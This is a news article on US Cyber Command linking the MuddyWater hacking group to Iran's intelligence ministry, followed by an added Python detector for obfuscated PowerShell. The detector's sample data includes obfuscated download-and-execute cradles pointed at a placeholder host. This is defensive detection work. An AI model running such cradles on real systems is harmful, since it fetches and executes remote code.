
US Cyber Command Warns of Iranian Threats

The US military’s Cyber Command this week detailed multiple hacking tools that officials say Iran’s Ministry of Intelligence and Security has used against computer networks “around the world.”

It’s the first time, according to a command spokesperson, that the US government has explicitly connected Iran’s intelligence ministry with a prolific espionage group known as MuddyWater that has in recent years tried to siphon data from telecom firms and other organizations across the Middle East.

U.S. Cyber Command’s Cyber National Mission Force identified and disclosed multiple open-source tools that an Iranian threat group has used to target networks in the Middle East, Europe and North America.

The “MuddyWater” threat group was described by Cyber Command as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS). The Congressional Research Service last summer reported that MOIS “conducts domestic surveillance to identify regime opponents. It also surveils anti-regime activists abroad through its network of agents placed in Iran’s embassies.”

Cyber Command said that if a network operator finds several of these tools on the same network, it may indicate the presence of Iranian malicious cyber actors. According to Cyber Command, the techniques MOIS uses include side-loading DLLs to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control (C2) functions. New samples showing the different parts of this tool suite were posted by Cyber Command to VirusTotal, along with JavaScript files used to establish connections back to malicious infrastructure.
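As an added example (not Cyber Command's disclosure and not any published MuddyWater sample), the following Python triages PowerShell process-creation command lines for the kind of obfuscation the paragraph describes: encoded commands, hidden windows, string splitting, character-code assembly, backtick insertion and download cradles. The command lines and the 192.0.2.x URLs are constructed for illustration, the heuristics are generic indicators of obfuscated launchers rather than a signature for a specific tool, and the score threshold is an assumption to tune against your own environment.

```python
"""Heuristic triage of PowerShell launch command lines for common obfuscation
signs (encoded commands, hidden windows, string splitting, char-code assembly,
backtick insertion, download cradles).

Added example: the command lines below are constructed for illustration and
are not Cyber Command's published samples; the heuristics are generic, not a
signature for any specific MuddyWater tool. 192.0.2.0/24 is a documentation
range (RFC 5737)."""
import base64
import binascii
import re
from typing import Optional

# Build the -EncodedCommand payload here (PowerShell expects UTF-16LE base64).
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    # benign: scheduled script run by path
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    # encoded, hidden window, no profile: classic launcher shape
    "powershell.exe -nop -w hidden -NonI -EncodedCommand " + _ENC,
    # string concatenation plus backtick-split cmdlet name
    r'''powershell -w hidden -c "$c=('Ne'+'t.We'+'bCl'+'ient'); I`E`X (New-Object $c).DownloadString('http://192.0.2.10/b')"''',
    # cmdlet name assembled from [char] codes ('iex')
    r'''powershell -c "&([char]105+[char]101+[char]120) ((New-Object Net.WebClient).DownloadString('http://192.0.2.10/c'))"''',
    # benign: interactive admin one-liner
    r"powershell.exe Get-ChildItem C:\Logs | Where-Object Length -gt 1MB",
]

# -e / -ec / -enc / -encodedcommand followed by a base64 blob
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
NOPROFILE = re.compile(r"-nop(?:rofile)?\b", re.I)
CONCAT = re.compile(r"'\s*\+\s*'")           # 'ab'+'cd' style string splitting
CHARCAST = re.compile(r"\[char\]\d+", re.I)  # [char]105+[char]101+...
BACKTICK = re.compile(r"[A-Za-z]`[A-Za-z]")  # I`E`X, Inv`oke-Expression
CRADLE = re.compile(
    r"downloadstring|downloadfile|\biex\b|invoke-expression|frombase64string", re.I
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16le", errors="replace")


def score_command_line(cmdline: str) -> dict:
    """Evaluate one process-creation command line against the heuristics."""
    decoded = decode_encoded_command(cmdline)
    # Inspect the decoded payload too, so a cradle hidden behind -enc is seen.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    indicators = {
        "encoded_command": decoded is not None,
        "hidden_window": bool(HIDDEN.search(cmdline)),
        "no_profile": bool(NOPROFILE.search(cmdline)),
        "string_concat": len(CONCAT.findall(cmdline)) >= 2,
        "char_cast": len(CHARCAST.findall(cmdline)) >= 2,
        "backtick_split": bool(BACKTICK.search(cmdline)),
        "download_cradle": bool(CRADLE.search(text)),
    }
    score = sum(indicators.values())
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "indicators": indicators,
        "score": score,
        # Two independent signs is the (assumed, tunable) bar for analyst review.
        "suspicious": score >= 2,
    }


def triage(cmdlines):
    """Score a batch of command lines; returns one result dict per line."""
    return [score_command_line(c) for c in cmdlines]


if __name__ == "__main__":
    for r in triage(SAMPLE_COMMAND_LINES):
        hits = [k for k, v in r["indicators"].items() if v]
        label = "SUSPICIOUS" if r["suspicious"] else "ok        "
        print(f"{label} score={r['score']} {hits}")
        if r["decoded"]:
            print("    decoded:", r["decoded"])
```

Feed it the CommandLine field from Sysmon Event ID 1 or Windows Event ID 4688 records. Decoding the -EncodedCommand argument before matching matters: a launcher that hides the download cradle behind base64 scores only on its switches otherwise, and the threshold is deliberately low so that a single benign flag such as -ExecutionPolicy Bypass on its own does not page anyone.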

Threat researchers tracking nation-state sponsored groups don't often get a glimpse of the organizations behind these operations. U.S. Cyber Command provided such insight by attributing the activity to MOIS rather than to the Iranian Revolutionary Guard Corps (IRGC), which many security experts had previously assumed was responsible.

MuddyWater has been actively tracked since as early as 2017. In a recent blog post, SentinelOne reported that it continues to see the group innovating: improving its custom malware, abusing tunneling tools, and adopting open-source exploits and frameworks to target Microsoft Exchange servers.

Like many other Iranian threat actors, the group displays less sophistication and technical complexity than other state-sponsored APT groups. Even so, MuddyWater's persistence appears to be a key to its success, and its relative lack of sophistication does not prevent it from achieving its goals.

The U.S. government's identification of Iranian state-backed activity is the first step toward doing something about it. Organizations should check their networks for the reported indicators and behavior and, if found, report them to the government.
